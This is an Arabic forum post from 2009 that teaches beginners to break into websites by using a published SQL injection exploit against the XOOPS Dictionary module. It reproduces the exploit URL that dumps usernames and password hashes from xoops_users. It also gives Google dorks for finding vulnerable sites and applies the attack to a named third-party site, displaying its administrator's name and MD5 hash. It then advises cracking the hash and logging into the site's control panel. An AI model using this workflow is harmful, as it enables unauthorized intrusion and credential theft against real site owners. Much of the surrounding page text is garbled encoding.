أ‡أ،أڑأ¦أڈأ‰   منتديات شبكة خورة العربية > المنتديات التقنية والإلكترونية > الأنترنت والكمبيوتر

الأنترنت والكمبيوتر كل ما يتعلق بالأنترنت والكمبيوتر يختص لـ برامج الكمبيوتر . عالم التقنيات . طرق صيانة الحواسيب . برمجة الكمبيوترات . Windows Vista . الأجهزة السلكية واللاسلكية . تطبيقات خاصة للحاسوب . ويندوز إكس بي . Windows XP . ويندوز فيستا . ويندوز ماك . Windows . مايكروسوفت . Microsoft . دروس اصلاح الكمبيوترات . معلومات حاسوبية . شروحات صيانة الأجهزة . شرح برمجة الحاسوب . سوفت وير . Software . آخر أخبار التقنيات المعلوماتيه . هاردسك . شاشات جديدة للكمبيوتر ..

 
أ‍أڈأ­أ£ 06-03-2009, 08:03 PM
  #1
مراقب
 أ‡أ،أ•أ¦أ‘أ‰ أ‡أ،أ‘أ£أ’أ­أ‰ The Thunder
 
أٹأ‡أ‘أ­أژ أ‡أ،أٹأ“أŒأ­أ،: Mar 2009
أ‡أ،أڈأ¦أ،أ‰: Yemen
أ‡أ،أ£أ”أ‡أ‘أںأ‡أٹ: 4,550
أ£أڑأڈأ، أٹأ‍أ­أ­أ£ أ‡أ،أ£أ“أٹأ¦أ¬: 864716
The Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond reputeThe Thunder has a reputation beyond repute
أ‡أ‌أٹأ‘أ‡أ–أ­ إخترااااااق المنتديات

[hide]تعلم قراءة الثغرات وأختراق المواقع والمنتديات(ادخل مبتدء وأطلع مبدع)

هذا الدرس يـ اخوان الى المبتدئين
يعني المحترفين ما راح يحتاجو الى هذا الدرس
هذا الدرس فقط يساعدك في فهم ومعرفة الثغرات المكتوبه وطريقة الإستفاده منها
الان


نروح الى احد مواقع الثغرات الكثيره
وانا اخترت الميل ورم لانه اسهل واحد
نفتح الصفحة الرئيسيه للموقع

http://www.milw0rm.com/

الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين
الا هي
ثالث خيار

الي لونهم بـ الاصفر
هذول جدد بـ تاريخ اليوم
والي لونهم اخضر يعني اقدم
وطبعا التاريخ مكتوب على جنب
انا بختار وحدة من الثغرات الموجوده
و اخترت هذي الثغره
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
مكتوب فيها كـ التالي

كود:
##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-17]


طيب نشرح شوي شوي
الجزء الاول




كود:
XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection

هذي معلومات عن الثغره
نوعيتها و وين الثغره موجوده و في اي اصدار
طيب
الثغره هذي في سكريبت اسمه XOOPS
وهذي مجله طبعا
على اية حال الثغره في dictionary
الا هو الدليل
والاصدارات هي
0.94-0.91-0.70
والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
وهي معلومات عن مكتشف الثغره


كود:
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
############################################
والان اهم جزئين
الجزء الاول الدورك

###########################################

كود:
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#شنو هذا الدورك
هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره
فـ لو كتبت في قوقل


كود:
allinurl: "modules/dictionary"

راح يطلع لك كل المواقع الي موجود فيها هذا
على اية حال
نختار موقع من المواقع
وانا اخترت


كود:
http://www.splatinvestigations.com/m...dictionaryنروح الى الجزاء الثاني المهم
الا وهو


كود:
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################

وهذا كود الإستغلال
يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
وراح يصير رابط الموقع مع الاستغلال كذا

كود:
http://www.splatinvestigations.com/m.../xoops_users/*

فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
طبعا الموضوع ما ينتهي هنا
الباسوورد مشفر بـ الـ MD5
والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
يعني الباسوورد مشفر والاسم موجود جنبه
وهم كذا
ARC-753: a19010808cc277ac5cc50548d7a61e8e
الي بـ الون الاحمر هذا الباسوورد المشفر
والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
النقطتين الرئسيتين فقط لتفريق بينهم
بعد ما تفك باسوورد الموقع
تدخل لوحة تحكم الموقع وتسوي الي يعجبك


بس لا تجربوا على موقعكم هههههه[/hide]
__________________
Time to go


[type=513054] كل الشكر والعرفان لــ رناا على التصميم الرائع[/type]
آخر مواضيعي
The Thunder أ›أ­أ‘ أ£أٹأ¦أ‡أŒأڈ أچأ‡أ،أ­أ‡أ°  
أ‘أڈ أ£أڑ أ‡أ‍أٹأˆأ‡أ“
 

أ£أ¦أ‡أ‍أڑ أ‡أ،أ¤أ”أ‘ (أ‡أ،أ£أ‌أ–أ،أ‰)


أ‡أ،أگأ­أ¤ أ­أ”أ‡أ¥أڈأ¦أ¤ أ£أچأٹأ¦أ¬ أ‡أ،أ£أ¦أ–أ¦أڑ أ‡أ،أ‚أ¤ : 1 ( أ‡أ،أƒأڑأ–أ‡أپ 0 أ¦أ‡أ،أ’أ¦أ‡أ‘ 1)
 

أٹأڑأ،أ­أ£أ‡أٹ أ‡أ،أ£أ”أ‡أ‘أںأ‰
أ،أ‡ أٹأ“أٹأکأ­أڑ أ…أ–أ‡أ‌أ‰ أ£أ¦أ‡أ–أ­أڑ أŒأڈأ­أڈأ‰
أ،أ‡ أٹأ“أٹأکأ­أڑ أ‡أ،أ‘أڈ أڑأ،أ¬ أ‡أ،أ£أ¦أ‡أ–أ­أڑ
أ،أ‡ أٹأ“أٹأکأ­أڑ أ…أ‘أ‌أ‡أ‍ أ£أ،أ‌أ‡أٹ
أ،أ‡ أٹأ“أٹأکأ­أڑ أٹأڑأڈأ­أ، أ£أ”أ‡أ‘أںأ‡أٹأں

BB code is أ£أٹأ‡أچأ‰
أںأ¦أڈ [IMG] أ£أٹأ‡أچأ‰
أںأ¦أڈ HTML أ£أڑأکأ،أ‰

أ‡أ،أ‡أ¤أٹأ‍أ‡أ، أ‡أ،أ“أ‘أ­أڑ

أ‡أ،أ£أ¦أ‡أ–أ­أڑ أ‡أ،أ£أٹأ”أ‡أˆأ¥أ¥
أ‡أ،أ£أ¦أ–أ¦أڑ أںأ‡أٹأˆ أ‡أ،أ£أ¦أ–أ¦أڑ أ‡أ،أ£أ¤أٹأڈأ¬ أ£أ”أ‡أ‘أںأ‡أٹ أ‚أژأ‘ أ£أ”أ‡أ‘أںأ‰
علمتني المنتديات فتى مرخه المنتدى العام 3 04-22-2009 10:00 AM
المنتديات من ألف إلى الياء النعمان الأنترنت والكمبيوتر 0 10-28-2008 10:09 AM
من ارررررررررررررررررررروع المنتديات جساس قسم الترحيب والتهاني والتواصل بين الأعضاء 16 09-07-2008 03:07 PM


أ‡أ،أ“أ‡أڑأ‰ أ‡أ،أ‚أ¤ 03:09 PM